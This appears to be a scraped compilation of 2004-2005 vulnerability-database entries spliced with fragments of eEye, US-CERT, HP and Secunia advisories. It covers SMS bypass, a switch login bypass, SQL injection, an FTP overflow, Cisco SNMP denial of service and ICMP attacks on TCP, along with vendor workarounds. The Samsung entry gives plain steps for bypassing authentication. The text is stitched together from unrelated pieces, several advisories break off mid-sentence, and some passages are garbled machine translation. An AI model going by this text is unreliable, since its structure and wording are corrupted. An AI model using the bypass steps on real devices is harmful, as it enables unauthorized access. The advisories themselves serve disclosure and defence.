This vulnerability has been assigned the CVE identifier CAN-2004-0431.
Credit:
Karl Lynn
Additional Research:
Derek Soeder
Greetings:
Riley Hassell, Fuzen, Cubby, the ladies in the band MudBath, Zoe bird,
Michelle L., and of course the entire staff at eEye.
Copyright (c) 1998-2004 eEye Digital Security Permission is hereby
granted for the redistribution of this alert electronically. It is not
to be edited in any way without express consent of eEye. If you wish to
reprint the whole or any part of this alert in any other medium
excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.
Feedback
Please send suggestions, updates, and comments to:
eEye Digital Security
http://www.eEye.com
info@eEye.com
VAR-200412-0758 | CVE-2004-2626 | Siemens S55 mobile phone SMS verification message bypass vulnerability |
CVSS V2: 3.7 CVSS V3: - Severity: LOW |
GUI overlay vulnerability in the Java API in Siemens S55 cellular phones allows remote attackers to send unauthorized SMS messages by overlaying a confirmation message with a malicious message. Siemens S55 is a mobile phone.
Siemens S55 has a race condition error when validating SMS messages.
No detailed vulnerability details are provided at this time. Reportedly the Siemens S55 is affected by an SMS confirmation message bypass vulnerability
VAR-200404-0064 | CVE-2004-1970 | Samsung SmartEther Switch Firmware verification bypasses the vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Samsung SmartEther SS6215S switch, and possibly other Samsung switches, allows remote attackers and local users to gain administrative access by providing the admin username followed by a password that is the maximum allowed length, then pressing the enter key after the resulting error message. When accessing a Samsung SmartEther switch, via the telnet service or serial connection, authentication is required and the user is presented with a logon screen. It has been reported that it is possible to bypass this authentication procedure.
An attacker may potentially exploit this condition to, for example, modify static MAC address mapping and perhaps enable man-in-the-middle style attacks. Other attacks are certainly possible. Samsung SmartEther SS6215S is a network switch. When connecting to a Samsung SmartEther switch, enter the user name \"admin\", enter the longest combination of characters in the password field (unable to enter) as the password data, and then press Enter, although it will prompt that the password does not match, but into the system
VAR-200404-0066 | CVE-2004-1972 | PHP-Nuke Multiple Video Gallery Module SQL Injection vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in modules.php in PHP-Nuke Video Gallery Module 0.1 Beta 5 allows remote attackers to execute arbitrary SQL code via the (1) clipid or (2) catid parameters in a viewclip, viewcat, or voteclip action. This is due to a failure of the application to properly sanitize user-supplied input prior to using it in an SQL query.
These issues may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information such as the administrator password hash or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation
VAR-200412-0769 | CVE-2004-2637 | Zonet Wireless Router NAT Implement design flaws |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
The NAT implementation in Zonet ZSR1104WE Wireless Router Runtime Code Version 2.41 converts IP addresses of inbound connections to the IP address of the router, which allows remote attackers to bypass intended security restrictions. A vulnerability has been reported to affect the implementation of NAT for the ZSR1104WE model Zonet Wireless Router. NAT for the wireless interface on the ZSR1104WE appliance is reported to modify IP data so that on the internal network, the origin address of forwarded traffic is that of the affected appliance. This issue may render the implementation of access controls on an internal host impossible. Zonet Wireless Router is a wireless access device. No detailed vulnerability details are currently available
VAR-200404-0080 | CVE-2004-1992 | SolarWinds Serv-U File Server Buffer error vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Buffer overflow in Serv-U FTP server before 5.0.0.6 allows remote attackers to cause a denial of service (crash) via a long -l parameter, which triggers an out-of-bounds read. Reportedly Serv-U is affected by a remote buffer overflow vulnerability in the list parameter. This issue is due to a failure of the application to properly validate buffer boundaries during processing of user input.
Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system with the privileges of the user that invoked the vulnerable application, although this has not been confirmed
VAR-200407-0001 | CVE-2004-0714 |
Cisco IOS fails to properly process solicited SNMP operations
Related entries in the VARIoT exploits database: VAR-E-200404-0128 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Internetwork Operating System (IOS) 12.0S through 12.3T attempts to process SNMP solicited operations on improper ports (UDP 162 and a randomly chosen UDP port), which allows remote attackers to cause a denial of service (device reload and memory corruption). Sustained exploitation of this vulnerability could lead to a denial of service condition affect a large segment of the Internet community. / Router disrupts service operation (DoS) It may be in a state. This is caused by a design error that causes memory corruption in the affected system under certain circumstances. The denial of service is due to a corruption of memory in the affected device. As a result, there may be other consequences, such as code execution. This has not been confirmed by Cisco. Cisco IOS is a very widely deployed network operating system. Many Cisco devices run IOS. Specially constructed malformed SNMPv1 and SNMPv2 can trigger this vulnerability, and more dangerously any SNMPv3 "talk" operation detected on such ports can cause memory corruption that overloads the device, resulting in a denial of service.
This vulnerability is distinct from the vulnerability described in
US-CERT Technical Alert TA04-111A issued earlier today. Cisco has
published an advisory about this distinct SNMP issue at the following
location:
<http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml>
I. Description
The Simple Network Management Protocol (SNMP) is a widely deployed
protocol that is commonly used to monitor and manage network devices.
There are several types of SNMP messages that are used to request
information or configuration changes, respond to requests, enumerate
SNMP objects, and send both solicited and unsolicited alerts. These
messages use UDP to communicate network information between SNMP
agents and managers. This may
potentially cause the device to reload.
Typically, ports 161/udp and 162/udp are used during SNMP operations
to communicate. While SNMPv1 and SNMPv2c formatted messages can trigger this
vulnerability, the greatest risk is exposed when any SNMPv3 solicited
operation is sent to a vulnerable port.
Cisco notes in their advisory:
"SNMPv1 and SNMPv2c solicited operations to the vulnerable ports will
perform an authentication check against the SNMP community string,
which may be used to mitigate attacks. Through best practices of
hard to guess community strings and community string ACLs, this
vulnerability may be mitigated for both SNMPv1 and SNMPv2c.
However, any SNMPv3 solicited operation to the vulnerable ports
will reset the device. If configured for SNMP, all affected
versions will process SNMP version 1, 2c and 3 operations."
Cisco is tracking this issue as CSCed68575. US-CERT is tracking this
issue as VU#162451.
II. Impact
A remote, unauthenticated attacker could cause the vulnerable device
to reload.
III. System managers are
encouraged to upgrade to one of the non-vulnerable releases. For
additional information regarding availability of repaired releases,
please refer to the "Software Versions and Fixes" section of the Cisco
Security Advisory.
<http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml>
Workarounds
Cisco recommends a number of workarounds, including disabling SNMP
processing on affected devices. For a complete list of workarounds,
see the Cisco Security Advisory.
Appendix A. Vendor Information
This appendix contains information provided by vendors for this
advisory. As vendors report new information to US-CERT, we will update
this section and note the changes in our revision history. If a
particular vendor is not listed below, we have not received their
comments. Cisco has published their advisory at the
following location:
<http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml>
_________________________________________________________________
US-CERT thanks Cisco Systems for notifying us about this problem.
_________________________________________________________________
Feedback can be directed to the authors: Jeff Havrilla, Shawn Hernan,
Damon Morda
The latest version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA04-111B.html>
_________________________________________________________________
Copyright 2004 Carnegie Mellon University.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
April 20, 2004: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQFAhdSYXlvNRxAkFWARAqPXAJ98/hPua542rVKLAgmOVFRJEbLgHACgsBYS
vP+68misX1RV+A2fWyU2NQA=
=jID6
-----END PGP SIGNATURE-----
VAR-200505-0928 | CVE-2005-0065 |
The Border Gateway Protocol relies on persistent TCP sessions without specifying authentication requirements
Related entries in the VARIoT exploits database: VAR-E-200504-0005, VAR-E-200504-0002, VAR-E-200504-0006 |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The original design of TCP does not check that the TCP sequence number in an ICMP error message is within the range of sequence numbers for data that has been sent but not acknowledged (aka "TCP sequence number checking"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged "Destination Unreachable" messages, (2) blind throughput-reduction attacks with forged "Source Quench" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.
ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.
Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.
The following individual attacks are reported:
- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.
A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.
- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.
A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.
- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.
A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.
**Update: Microsoft platforms are also reported prone to these issues
VAR-200504-0003 | CVE-2004-0791 |
The Border Gateway Protocol relies on persistent TCP sessions without specifying authentication requirements
Related entries in the VARIoT exploits database: VAR-E-200504-0005, VAR-E-200504-0002, VAR-E-200504-0006, VAR-E-200404-0002 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Multiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (network throughput reduction for TCP connections) via a blind throughput-reduction attack using spoofed Source Quench packets, aka the "ICMP Source Quench attack." NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. In multiple vendor products TCP The implementation of ICMP Included in error message IP Address and TCP There is a flaw that only validates the port and does not check that the sequence number is in the proper range. This ICMP source quench Established by processing error messages TCP There is a vulnerability that reduces connection throughput. The vulnerability is ICMP Vulnerabilities resulting from message processing (CVE-2004-0790, CVE-2004-0791, CVE-2004-1060) Out of CVE-2004-0791 Vulnerability published as. TCP Due to vulnerabilities that affect implementation, a wide range of products are affected by these vulnerabilities. For more information, NISCC-532967 (JVN) , NISCC Advisory 532967/NISCC/ICMP (CPNI Advisory 00303) Please check also.Intentionally created fraud ICMP By processing error messages TCP Connection is reset, resulting in service disruption (DoS) It can cause a condition. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.
ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.
Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.
The following individual attacks are reported:
- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.
A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.
- An ICMP Source Quench attack. The Mitre ID CAN-2004-0791 is assigned to this issue.
A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.
- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.
A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.
**Update: Microsoft platforms are also reported prone to these issues. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
HP SECURITY BULLETIN
HPSBUX01164 REVISION: 4
SSRT4884 rev.4 - HP-UX TCP/IP Remote Denial of Service (DoS)
NOTICE:
There are no restrictions for distribution of this Security
Bulletin provided that it remains complete and intact.
The information in this Security Bulletin should be acted upon
as soon as possible.
INITIAL RELEASE:
10 July 2005
POTENTIAL SECURITY IMPACT:
Remote Denial of Service (DoS)
SOURCE:
Hewlett-Packard Company
HP Software Security Response Team
VULNERABILITY SUMMARY:
A potential security vulnerability has been identified with HP-UX
running TCP/IP. This vulnerability could be remotely exploited by
an unauthorized user to cause a Denial of Service(DoS).
REFERENCES:
NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.04, B.11.11, B.11.22, B.11.23 running TCP/IP.
HP-UX B.11.11 and B.11.23 running TOUR (Transport Optional Upgrade
Release).
BACKGROUND:
AFFECTED VERSIONS
HP-UX B.11.22
HP-UX B.11.00
=============
Networking.NET2-KRN
action: set ip_pmtu_strategy= 0 and either install binary
files or filter ICMP
HP-UX B.11.11
=============
Networking.NET2-KRN
action: set ip_pmtu_strategy= 0 and install PHNE_33159
HP-UX B.11.23
=============
Networking.NET2-KRN
->action: set ip_pmtu_strategy= 0 and install PHNE_32606
HP-UX B.11.11
HP-UX B.11.23
=============
TOUR_PRODUCT.T-NET2-KRN
action: set ip_pmtu_strategy= 0 and filter ICMP
HP-UX B.11.04
=============
Networking.NET2-KRN
action: set ip_pmtu_strategy= 0 and filter ICMP
END AFFECTED VERSIONS
Note: The latest TOUR (Transport Optional Upgrade Release),
version 2.4, is available on B.11.11 only. The latest
Transport Functionality is available to B.11.23 customers
in the HP-UX 11i v2 September 2004 release. Customers
using TOUR on B.11.23 can apply the workaround (set
ip_pmtu_strategy= 0 and filter ICMP) or upgrade to the
HP-UX 11i v2 September 2004 release. After upgrading the
action for B.11.23 Networking.NET2-KRN listed above should
be implemented.
<http://www.uniras.gov.uk/niscc/docs/al-20050412-00308.html?
lang=en>
There are three issues reported in NISCC VU#532967:
CVE number: CAN-2004-0790
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0790>
CVE number: CAN-2004-0791
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0791>
CVE number: CAN-2004-1060
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1060>
Workarounds are available for all three of these issues.
Until binary files are available for B.11.04 the workarounds
should be used.
->Binary files are available for CAN-2004-0790 and CAN-2004-0791
for HP-UX B.11.00 and B.11.22.
Since PHNE_33159 is now available for B.11.11 the preliminary
binary files for B.11.11 have been removed from the ftp site.
->Since PHNE_32606 is now available for B.11.23 the preliminary
binary files for B.11.23 have been removed from the ftp site.
Note: If the TOUR (Transport Optional Upgrade Release) product is
installed the binary files cannot be used.
Until the TOUR product is revised there are several options:
B.11.11
1. Use the workarounds.
or
2. Remove TOUR and install the binary files.
B.11.23
1. Use the workarounds.
or
2. Upgrade to the HP-UX 11i v2 September 2004 release
and install the binary files.
TOUR(Transport Optional Upgrade Release) is available from
<http://www.hp.com/go/softwaredepot>.
Workaround for CAN-2004-1060 may not be necessary.
===================================
Although changes in the binary files and patches for CAN-2004-0790
and CAN-2004-0791 do not prevent the exploit of CAN-2004-1060,
they do make it less likely to succeed. The sequence number check
suggested in section 5.1 of <http://www.ietf.org/internet-drafts/
draft-gont-tcpm-icmp-attacks-03.txt> has been implemented.
Customers should consider whether this check reduces the risk of
the exploit to the point that setting ip_pmtu_strategy=0 is not
required.
If the workaround for CAN-2004-1060 is to be used, please note
the following:
=================================================
HPSBUX01137 recommends setting ip_pmtu_strategy = 0 or 3 as a
workaround for the problem of CAN-2005-1192. CAN-2004-1060 has a
different root cause and cannot be worked around with
p_pmtu_strategy=3. To work around both CAN-2005-1192 and
CAN-2004-1060 ip_pmtu_strategy=0 must be used.
Please refer to the Manual Actions section below for a summary of
the required actions.
Workarounds:
CAN-2004-0790 and CAN-2004-0791
Filter out the following ICMP messages:
Type 3, Code 2 (Destination Unreachable, Protocol Unreachable)
Type 3, Code 3 (Destination Unreachable, Port Unreachable)
Type 4, Code 0 (Source Quench)
CAN-2004-1060
Set ip_pmtu_strategy=0.
Note: Filtering "Protocol Unreachable" and "Port Unreachable"
should not be done without careful testing. Filtering these
out may interfere with the correct functioning of network
components.
Filtering "Source Quench" should present little risk.
Setting ip_pmtu_strategy=0
==================
Edit /etc/rc.config.d/nddconf to add the following:
TRANSPORT_NAME[n]=ip
NDD_NAME[n]=ip_pmtu_strategy
NDD_VALUE[n]=0
where 'n' is the next available index value as described in the
nddconf comments.
This value will take effect when the system is rebooted.
Until the system can be rebooted use the following command
to read the /etc/rc.config.d/nddconf file and set the tunable
parameters:
/usr/bin/ndd -c
The ip_pmtu_strategy parameter can be displayed by the
following command:
/usr/bin/ndd -get /dev/ip ip_pmtu_strategy
Note: Since open connections will remain potentially vulnerable
until they are closed and certain internal data structures
are released it is recommended that the system be rebooted.
Note: There is a defect that will cause "ndd -c" to fail if there
are more than 10 directives in /etc/rc.config.d/nddconf.
That defect is fixed in the following patches:
B.11.11 - PHNE_25644 or subsequent
B.11.04 - PHNE_26076 or subsequent
B.11.00 - PHNE_26125 or subsequent
Preliminary binary files
==============
->Preliminary binary files are available for B.11.00 and B.11.22.
Patches are available for B.11.11 and B.11.23. The patches and
the preliminary binary files address CAN-2004-0790 and
CAN-2004-0791 only. Although changes in the patches and binary
files for CAN-2004-0790 and CAN-2004-0791 do not prevent the
exploit of CAN-2004-1060, they do make it less likely to succeed.
Instructions for downloading and installing the binary files are
contained in readme files available here:
System: hprc.external.hp.com (192.170.19.51)
Login: icmp
Password: icmp
FTP Access:
ftp://icmp:icmp@hprc.external.hp.com/
or: ftp://icmp:icmp@192.170.19.51/
Note: The links above may not work for all browsers. If the
link fails the url should be entered directly into the
browser's address field.
Since a patch is available for B.11.11 the readme.11.11.txt and
corresponding binary files have been removed from the ftp site.
->Since a patch is available for B.11.23 the readme.11.23.txt and
corresponding binary files have been removed from the ftp site.
Download the appropriate readme file containing further
instructions:
readme.11.00.txt
readme.11.22.txt
Verify the cksum or md5sum:
->Note: The readme files have not changed since rev.1 of this
Security Bulletin.
cksum readme*
2844254744 2546 readme.11.00.txt
2836317466 2469 readme.11.22.txt
md5sum readme*
d28504f8532192de6a4f33bba4ea90ec readme.11.00.txt
cafbb24f3dc7131501142f75deaeccbd readme.11.22.txt
Download and install the binary files as discussed in the readme
files. The binary files are available in the same directory as
the readme files.
For B.11.11 download and install PHNE_33159. The patch is
available from < http://itrc.hp.com>.
->For B.11.23 download and install PHNE_32606. The patch is
available from < http://itrc.hp.com>.
MANUAL ACTIONS: Yes - NonUpdate
1. Set ip_pmtu_strategy=0
2. EITHER
a. Filter out the following ICMP messages:
Type 3, Code 2 (Destination Unreachable, Protocol Unreachable)
Type 3, Code 3 (Destination Unreachable, Port Unreachable)
Type 4, Code 0 (Source Quench)
OR
b. Install the appropriate binary file or patch (binary file
not available for B.11.04).
BULLETIN REVISION HISTORY:
Revision 0: 25 May 2005
Initial release
Revision 1: 1 June 2005
Binary files for B.11.00 and B.11.22 are available.
Added information about CAN-2004-1060.
The "set ip_pmtu_strategy=0" workaround is required even if
binary files are installed.
Removed IPSec information.
Revision 2: 19 June 2005
TOUR (Transport Optional Upgrade Release) on B.11.11 and B.11.23
is potentially vulnerable.
Added a description of the sequence number check implemented in
the binary files.
Revision 3: 27 June 2005
PHNE_33159 is available for B.11.11. The B.11.11 binary files
have been removed from the ftp site.
Revision 4: 10 July 2005
PHNE_32606 is available for B.11.23. The B.11.23 binary files
have been removed from the ftp site.
HP-UX SPECIFIC SECURITY BULLETINS*: Security Patch Check revision
B.02.00 analyzes all HP-issued Security Bulletins to provide a
subset of recommended actions that potentially affect a specific
HP-UX system.
For more information:
http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/
displayProductInfo.pl?productNumber=B6834AA
SUPPORT: For further information, contact normal HP Services
support channel.
REPORT: To report a potential security vulnerability with any HP
supported product, send Email to: security-alert@hp.com. It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information. To obtain the security-alert PGP key please send an
e-mail message to security-alert@hp.com with the Subject of
'get key' (no quotes).
SUBSCRIBE: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&
langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your IRTC security bulletins and patches
- check ALL categories for which alerts are required and
continue.
Under Step2: your IRTC operating systems
- verify your operating system selections are checked and
save.
To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page
Subscriber's choice for Business: sign-in.
On the Web page:
Subscriber's Choice: your profile summary
- use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit:
http://itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number:
GN = HP General SW,
MA = HP Management Agents,
MI = Misc. 3rd party SW,
MP = HP MPE/iX,
NS = HP NonStop Servers,
OV = HP OpenVMS,
PI = HP Printing & Imaging,
ST = HP Storage SW,
TL = HP Trusted Linux,
TU = HP Tru64 UNIX,
UX = HP-UX,
VV = HP Virtual Vault
System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to
bring to the attention of users of the affected HP products the
important security information contained in this Bulletin. HP
recommends that all users determine the applicability of this
information to their individual situations and take appropriate
action. HP does not warrant that this information is necessarily
accurate or complete for all user situations and, consequently, HP
will not be responsible for any damages resulting from user's use
or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either
express or implied, including the warranties of merchantability
and fitness for a particular purpose, title and non-infringement."
(c)Copyright 2005 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or
editorial errors or omissions contained herein. The information
provided is provided "as is" without warranty of any kind. To the
extent permitted by law, neither HP nor its affiliates,
subcontractors or suppliers will be liable for incidental, special
or consequential damages including downtime cost; lost profits;
damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration.
The information in this document is subject to change without
notice. Hewlett-Packard Company and the names of Hewlett-Packard
products referenced herein are trademarks of Hewlett-Packard
Company in the United States and other countries. Other product
and company names mentioned herein may be trademarks of their
respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBQtJVE+AfOvwtKn1ZEQKwPwCeLKNxE1048xGZniru4epJ6YAqYIcAn2+Y
fjKXZ3hbnTeQeIn9Kk9ePC1d
=cFE+
-----END PGP SIGNATURE-----
.
HP Tru64 UNIX 5.1B-3
HP Tru64 UNIX 5.1B-2/PK4
HP Tru64 UNIX 5.1A PK
HP Tru64 UNIX 4.0G PK4
HP Tru64 UNIX 4.0F PK8
BACKGROUND:
Special Instructions for the Customer
The Internet Control Message Protocol (ICMP) (RFC 792) is used in
the Internet Architecture to perform fault-isolation and recovery
(RFC816), which is the group of actions that hosts and routers
take to determine if a network failure has occurred.
The industry standard TCP specification (RFC 793) has a
vulnerability whereby ICMP packets can be used to perform a
variety of attacks such as blind connection reset attacks and
blind throughput-reduction attacks.
Path MTU Discovery (RFC 1191) describes a technique for
dynamically discovering the MTU (maximum transmission unit) of an
arbitrary internet path. This protocol uses ICMP packets from
the router to discover the MTU for a TCP connection path.
HP has addressed these potential vulnerabilities by providing a
new kernel tunable in Tru64 UNIX V5.1B and 5.1A,
icmp_tcpseqcheck. In Tru64 4.0F and 4.0G, HP has introduced two
new kernel tunables, icmp_tcpseqcheck and icmp_rejectcodemask. This behavior protects TCP
against spoofed ICMP packets.
Set the tunable as follows:
icmp_tcpseqcheck=1 (default)
Provides a level of protection that reduces the possibility
of considering a spoofed ICMP packet as valid
to one in two raised to the thirty-second power.
icmp_tcpseqcheck=0
Retains existing behavior, i.e., accepts all ICMP packets
icmp_rejectcodemask
In the Requirements for IP Version 4 Routers (RFC 1812), research
suggests that the use of ICMP Source Quench packets is an
ineffective (and unfair) antidote for congestion. Thus, HP
recommends completely ignoring ICMP Source Quench packets using
the icmp_rejectcodemask tunable. The icmp_rejectcodemask is a
bitmask that designates the ICMP codes that the system should
reject. For example, to reject ICMP Source Quench packets,
set the mask bit position for the ICMP_SOURCEQUENCH code 4,
which is two to the 4th power = 16 (0x10 hex).
The icmp_rejectcodemask tunable can be used to reject any
ICMP packet type, or multiple masks can be combined to reject
more than one type.
Note: the ICMP type codes are defined in
"/usr/include/netinet/ip_icmp.h".
Set the tunable as follows:
icmp_rejectcodemask = 0x10
Rejects ICMP Source Quench packets
icmp_rejectcodemask = 0 (default)
Retains existing behavior, i.e., accepts all ICMP packets
Adjusting the variables
The ICMP sequence check variable (icmp_tcpseqcheck) can be
adjusted using the sysconfig and sysconfigdb commands:
# sysconfig -q inet icmp_tcpseqcheck
inet:
icmp_tcpseqcheck = 1
# sysconfig -r inet icmp_tcpseqcheck=0
icmp_tcpseqcheck: reconfigured
# sysconfig -q inet icmp_tcpseqcheck
inet:
icmp_tcpseqcheck = 0
# sysconfig -q inet icmp_tcpseqcheck > /tmp/icmp_tcpseqcheck_merge
# sysconfigdb -m -f /tmp/icmp_tcpseqcheck_merge inet
# sysconfigdb -l inet
inet:
icmp_tcpseqcheck = 1
Similarly, the icmp_rejectcodemask variable can be adjusted using
the sysconfig and sysconfigdb commands:
# sysconfig -q inet icmp_rejectcodemask
inet:
icmp_rejectcodemask = 0
# sysconfig -r inet icmp_rejectcodemask=0x10
icmp_rejectcodemask: reconfigured
# sysconfig -q inet icmp_rejectcodemask
inet:
icmp_rejectcodemask = 16
# sysconfig -q inet icmp_rejectcodemask
> /tmp/icmp_rejectcodemask_merge
# sysconfigdb -m -f /tmp/icmp_rejectcodemask_merge inet
# sysconfigdb -l inet
inet:
icmp_rejectcodemask = 16
RESOLUTION:
Until the corrections are available in a mainstream
release patch kit, HP is releasing the following Early Release
Patch (ERP) kits publicly for use by any customer.
The ERP kits use dupatch to install and will not install over
any installed Customer Specific Patches (CSPs) that have file
intersections with the ERPs. Contact your service provider for
assistance if the ERP installation is blocked by any of your
installed CSPs.
The fixes contained in the ERP kits are scheduled to be
available in the following mainstream patch kits:
HP Tru64 Unix 5.1B-4
Early Release Patches
The ERPs deliver the following file:
/sys/BINARY/inet.mod
HP Tru64 UNIX 5.1B-3 ERP Kit Name:
T64KIT0025925-V51BB26-ES-20050628
Kit Location:
http://www.itrc.hp.com/service/patch/patchDetail.do?
patchid=T64KIT0025925-V51BB26-ES-20050628
MD5 checksum: 129251787a426320af16cd584b982027
HP Tru64 UNIX 5.1B-2/PK4 ERP Kit Name:
T64KIT0025924-V51BB25-ES-20050628
Kit Location:
http://www.itrc.hp.com/service/patch/patchDetail.do?
patchid=T64KIT0025924-V51BB25-ES-20050628
MD5 checksum: 5fcc77a6876db6d10ef07ac96e11b3af
HP Tru64 UNIX 5.1A PK6 ERP Kit Name:
T64KIT0025922-V51AB24-ES-20050628
Kit Location:
http://www.itrc.hp.com/service/patch/patchDetail.do?
patchid=T64KIT0025922-V51AB24-ES-20050628
MD5 checksum: 7c373b35c95945651a1cfda96bf71421
HP Tru64 UNIX 4.0G PK4 ERP Kit Name:
T64KIT0025920-V40GB22-ES-20050628
Kit Location:
http://www.itrc.hp.com/service/patch/patchDetail.do?
patchid=T64KIT0025920-V40GB22-ES-20050628
MD5 checksum: 13849fd555239d75d300d1cb46dc995f
HP Tru64 UNIX 4.0F PK8 ERP Kit Name:
DUXKIT0025921-V40FB22-ES-20050628
Kit Location:
http://www.itrc.hp.com/service/patch/patchDetail.do?
patchid=T64KIT0025920-V40GB22-ES-20050628
MD5 checksum: 743b614d39f185802701b7f2dd14ffa5
MD5 checksums are available from the ITRC patch database main
page:
http://www.itrc.hp.com/service/patch/mainPage.do
- From the patch database main page, click Tru64 UNIX,
then click verifying MD5 checksums under useful links.
----------------------------------------------------------------------
Want a new IT Security job?
Vacant positions at Secunia:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
Cisco Various Products ICMP Message Handling Denial of Service
SECUNIA ADVISORY ID:
SA14904
VERIFY ADVISORY:
http://secunia.com/advisories/14904/
CRITICAL:
Less critical
IMPACT:
DoS
WHERE:
>From remote
OPERATING SYSTEM:
Cisco Content Services Switch 11000 Series (WebNS)
http://secunia.com/product/1507/
Cisco Global Site Selector (GSS) 4480 1.x
http://secunia.com/product/2270/
Cisco IOS 10.x
http://secunia.com/product/184/
Cisco IOS 11.x
http://secunia.com/product/183/
Cisco IOS 12.x
http://secunia.com/product/182/
Cisco IOS R11.x
http://secunia.com/product/53/
Cisco IOS R12.x
http://secunia.com/product/50/
Cisco IOS XR (CRS-1) 3.x
http://secunia.com/product/4907/
Cisco ONS 15000 Series
